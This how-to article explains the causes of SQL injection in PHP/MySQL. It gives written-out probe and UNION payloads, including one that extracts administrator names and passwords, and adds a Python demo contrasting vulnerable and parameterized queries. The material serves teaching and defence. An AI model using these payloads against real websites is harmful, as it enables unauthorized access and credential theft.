
Analysis of the causes of PHP and MYSQL injection

2025-01-19 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)06/01 Report--

This article introduces the basics behind "Analysis of the causes of PHP and MYSQL injection". Many people run into exactly this situation when working through real cases, so the editor walks through how it arises. Read carefully and you should take something away from it.

When the articleid variable is 123, what code do we assume runs on the server?

SELECT *            /* SELECT reads the information */
FROM infotable      /* from the data table (infotable) */
WHERE id='123';     /* only the row that meets the condition */

/* XXXX */ is a comment: everything between /* and */ is automatically ignored when the program runs.

The statement the system actually executes looks like this:

Select * from infotable where id = '123'

Here the value of id, "123", is taken from the URL. So what happens if we request this instead:

Info.php?articleid=123'

A single quotation mark has been appended. Compare the statement the system originally executed with the new one:

Select * from infotable where id = 123

Select * from infotable where id = 123'

The second statement has an extra quotation mark, which is a syntax error.

Note: when a program does not produce the desired result, there are two kinds of error: a syntax error and a logic error. Read carefully and the difference will become clear; it is also why a single quotation mark is appended to the URL to judge whether it is an injection point. (An error after adding the single quotation mark does not by itself prove the URL is an injection point; it is only one step of the judgment.) With that in mind, the purpose of the following 1=1 and 1=2 tests becomes clear.

Select * from infotable where id = 123

Select * from infotable where id = 123 and 1 = 1   -- 1 is in fact equal to 1, so the normal page should be returned

Select * from infotable where id = 123 and 1 = 2   -- 1 is never equal to 2, so a logic error occurs and the error page is returned

Manual injection usually relies on the union query (UNION). Here is how union is used.

The first step of union injection is usually to guess the number of fields. Assume the injection point is the news page and the SQL statement executed by the page is:

Select title,date,author,news,comm from news where id = 12

In union injection, the statement before the union and the statement after it are each a complete SQL statement that could be executed on its own. However, the number of fields before and after the union must be the same, as in the statement above:

Select title,date,author,news,comm from news where id = 12

Select title,date,author,news,comm from news where id = 12 union select name,password,3,4,5 from admin

Here news is the news table and admin is the administrator information table.

The administrator table obviously does not have as many fields as the news table before the union, so the numbers 3 to 5 are used as fillers. The numbers have no fixed format: they can be 1, 2 and 3, or 111111 and 4435435, or simply null.

So the injection statement above is actually constructed like this:

Info.php?id=12+union+select+name,password,3,4,5+from+admin

In SQL injection the plus sign is used to represent a space, because some browsers automatically convert spaces to %20.

If there are five fields before the union and not five after it, a logic error occurs and the error page is displayed.

Since we do not know how many fields the programmer has put in the table, we usually guess the number of fields first, that is:

1. Info.php?id=12+union+select+1

2. Info.php?id=12+union+select+1,2

3. Info.php?id=12+union+select+1,2,3

4. Info.php?id=12+union+select+1,2,3,4

5. Info.php?id=12+union+select+1,2,3,4,5

You can also guess with order by; look up its usage yourself.

Keep guessing in this way: when the page comes back correctly, without a logic error, the number of fields matches, and the later steps build on that.

This is only the general idea.
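The probes described above (the stray quotation mark, the 1=1 / 1=2 pair, and the union column-count guessing) all come down to the URL value being spliced into the SQL text. The following is an added example, not code from the original article: it reproduces that pattern against a constructed in-memory database, then shows the hardened form, where the id is type-checked and bound as a parameter so the same inputs can no longer change the statement. Python's standard-library sqlite3 module stands in for the PHP/MySQL stack; the table contents are made up for the demonstration.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the article's news and admin tables."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE news(id INTEGER, title TEXT, date TEXT, author TEXT, news TEXT, comm TEXT);
        CREATE TABLE admin(name TEXT, password TEXT);
        INSERT INTO news VALUES (12, 'Release notes', '2024-06-01', 'editor', 'body text', 'no comments');
        INSERT INTO admin VALUES ('admin', 'hash-placeholder');
    """)
    return conn


def vulnerable_query(conn, articleid):
    """The article's pattern: the URL value is spliced into the SQL text unchanged."""
    sql = f"SELECT title,date,author,news,comm FROM news WHERE id = {articleid}"
    try:
        return "ok", conn.execute(sql).fetchall()
    except sqlite3.Error as exc:
        # A stray quote (syntax error) or a UNION with the wrong number of
        # columns ends up here; the article's "error page" is this message
        # being shown to the browser, which is what tells the prober something.
        return "error", str(exc)


def safe_query(conn, articleid):
    """Hardened form: validate the type, then bind the value as a parameter."""
    try:
        id_value = int(articleid)  # an article id must be an integer; anything else is rejected
    except ValueError:
        return "rejected", []
    # The driver sends the value separately from the statement text, so it is
    # only ever compared against id, never parsed as SQL.
    sql = "SELECT title,date,author,news,comm FROM news WHERE id = ?"
    return "ok", conn.execute(sql, (id_value,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    for probe in ("12", "12'", "12 and 1=1", "12 and 1=2",
                  "12 union select 1,2,3,4",
                  "12 union select name,password,3,4,5 from admin"):
        print("vulnerable", repr(probe), "->", vulnerable_query(db, probe)[0])
        print("safe      ", repr(probe), "->", safe_query(db, probe)[0])
```

Run it and the vulnerable function answers "ok" with one row, "error", "ok" with one row, "ok" with no rows, "error", and "ok" with two rows (the second containing the admin credentials), which is exactly the sequence of responses the article's guessing steps look for; the hardened function answers "ok" only for the plain "12" and "rejected" for everything else.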

This concludes "Analysis of the causes of PHP and MYSQL injection". Thank you for reading. If you want to learn more about the industry, follow this website; the editor will publish more practical articles for you.
